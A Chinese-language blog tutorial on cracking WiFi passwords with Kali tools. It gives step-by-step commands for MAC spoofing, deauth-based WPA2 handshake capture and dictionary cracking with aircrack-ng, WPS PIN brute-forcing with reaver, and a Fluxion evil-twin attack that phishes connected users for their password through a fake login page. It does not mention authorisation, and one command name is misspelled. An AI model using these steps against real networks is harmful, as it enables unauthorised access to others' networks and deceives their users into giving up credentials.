本文主要介绍了破解WiFi密码的多个方法,包括Aircrack-ng套件的使用、路由器的PIN码破解以及社工神器Fluxion工具套件的简单使用…

  1. 本文希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.
  2. 文中可能存在错误操作或错误理解,望大家不吝指正.

!阅前须知!
本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记
本文中的工具可能已经过时,或者使用方法已经改变了,感兴趣可以深入查阅资料.
(但是我还是列出以前的使用方法供大家借鉴).

ps.若对无线攻击手段ARP欺骗感兴趣可以参考以下两篇文章
【无线安全实践入门】基础攻击手段与常用工具简介
【无线安全实践入门】网络扫描和ARP欺骗

ps.
本文环境在Kali下,学习最好具备一点linux基础知识.
本文中的\’混杂模式\’并不是所有网卡都支持,详请搜索支持网卡型号.
本文第一节和第二节的方法受限于硬件配置等因素,破解时间过长也是合理的.

非常优秀的无线网络分析套件,功能强大.
许多安全软件套件都默认(添加/调用)此套件来完成操作.

  1. --首先,先要切换到能够支持\'混杂模式\'的网卡(一般都是购买USB无线网卡)
  2. --开启混杂模式(开启之后,网卡名可能会改变)
  3. > ifconfig (网卡名) down
  4. > iwconfig (网卡名) mode monitor
  5. > ifconfig (网卡名) up

1.1.连接MAC地址绑定的wifi

  1. --查看附件网络中的wifi,并观察其详细信息(channelBSSID(MAC)等)
  2. > airodump-ng (网卡名)
  3. --得知详细信息后,可以停止查看(ctrl+c)
  4. --开始拿有效的mac地址信息(尽量等久点,包多点)
  5. > airodump-ng -c (信道channel) --bssid (BSSID(MAC) (网卡名)
  6. --拿到有效mac地址(不要拿到路由器的mac)
  7. --修改本机mac
  8. > ifconfig (网卡名) down
  9. > macchanger -m (MAC地址) (网卡名)
  10. > ifconfig (网卡名) up
  11. --注意,此方法拿到有效mac地址,并未拿到wifi密码

1.2.WPA2加密的wifi

  1. --查看附件网络中的wifi,并观察其详细信息(channelBSSID(MAC)等)
  2. > airodump-ng (网卡名)
  3. --得知详细信息后,可以停止查看(ctrl+c)
  4. --开始进行查看routeclientmac地址,[-w]选项的意思就是write
  5. > airodump-ng -w wpa -c (信道channel) --bssid (BSSID(MAC) (网卡名) --ignore-negative-one
  6. --查看routeclientmac地址
  7. --开始获得握手包.cap
  8. > airoplay-ng --deauth 10 -a (routemac) -c (clientmac) (网卡名) --ignore-negative-one
  9. --对握手包.cap进行破解
  10. aircrack-ng -w (指定字典) (cap握手包名)
  11. --字典可以自己制作(Crunch工具),也可以在网上下载大神的字典
  12. --一个NB的字典,对你的破解!事半功倍!

1.3.WEP加密的wifi

  1. --由于这种加密基本已经舍弃了,所以就不说了

通过输入PIN码来连接wifi也是可以的,PIN码的破解也是一种不错的方法.
常见的工具有reaverminidwep-gtk等工具,这里我就说下reaver工具.

  1. --首先,先要切换到能够支持\'混杂模式\'的网卡(一般都是购买USB无线网卡)
  2. --开启混杂模式(开启之后,网卡名可能会改变)
  3. > ifconfig (网卡名) down
  4. > iwconfig (网卡名) mode monitor
  5. > ifconfig (网卡名) up
  6. --选做:可以尝试扫描是否有启用WPSwifi
  7. --Wash工具就是一款针对\'判断wifi是否启用WPS\'的工具
  8. --查看附件网络中的wifi,并观察PWR值小于70的来破解(记录BSSID,记住要是路由器的)
  9. > airodump-ng (网卡名)
  10. --开始进行破解(注意是路由器的MAC地址,PIN码是针对路由器的)
  11. > reaver -i (网卡名) -b (路由器MAC地址) -a -S -vv
  12. --1.如果出现 warning fail to associate ...
  13. --则说明破解失败(失败原因包括对象路由器未开启WPS等)
  14. --2.提示给出了 PIN PIN码和PSK密钥(wifi密码)
  15. --则说明破解成功(记录PIN码)/(使用PSK密钥直接尝试连接wifi)
  16. --选做:可以尝试得到wifi密码(PIN码是可以连wifi)
  17. reaver -i (网卡名) -b (路由器MAC地址) -p (刚得到的PIN码)

一个非常不错的社工破解wifi神器.

与前面操作思路不同.
它是通过模拟原有wifi(FakeAP),用户进行连接
然后wifi会断开网络,并向连接用户发送请求(浏览器跳转页面),请求输入原wifi密码
用户在收到请求后,只需输入正确密码,wifi就会恢复网络,而你获得wifi密码
注意,Fluxion会自动判断wifi密码是否正确,从而做出下一步操作
ps.此方法的好处就是不用耗费资源去破解密码.

ps.Fluxion运行时需要调用许多其它工具,部分工具可能需要另行下载(运行时会提示有哪些未下载)

  1. --运行软件(在软件目录下)
  2. > ./fluxion
  3. > 网卡(选择网卡)
  4. > channels(选择所有信道)
  5. > 扫描wifi(扫描到需要的结果时,按ctrl+c)
  6. > 选择wifi(输入123等选择)
  7. --建立一个假AP
  8. > 选择攻击方式(选FakeAP-Hostapd...)
  9. > 选择保存路径(可空格跳过,则保存在桌面/root/Desktop/)
  10. --会自动出现窗口
  11. > 握手包选择(aircrack-ng...)
  12. --抓包分配包
  13. > 数据包分配(Deauth all)
  14. --若是以上步骤正确完成,等抓包抓完,会出现选择
  15. > 选择web interface
  16. > 选择语言(提示用户输入密码时的界面语言)
  17. --等待用户连接上网,在浏览器输入正确密码(工具会自动验证密码是否正确),工具就会自动停止
  18. --获得wifi正确密码

破解wifi可以说是比较有意思、并且有挑战性的一块知识点了,
更多的无线攻防操作,其实都是建立在连入局域网的前提之下的.

加油,共勉

版权声明:本文为PisecesPeng原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/pisecespeng/p/11174595.html?ivk_sa=1024320u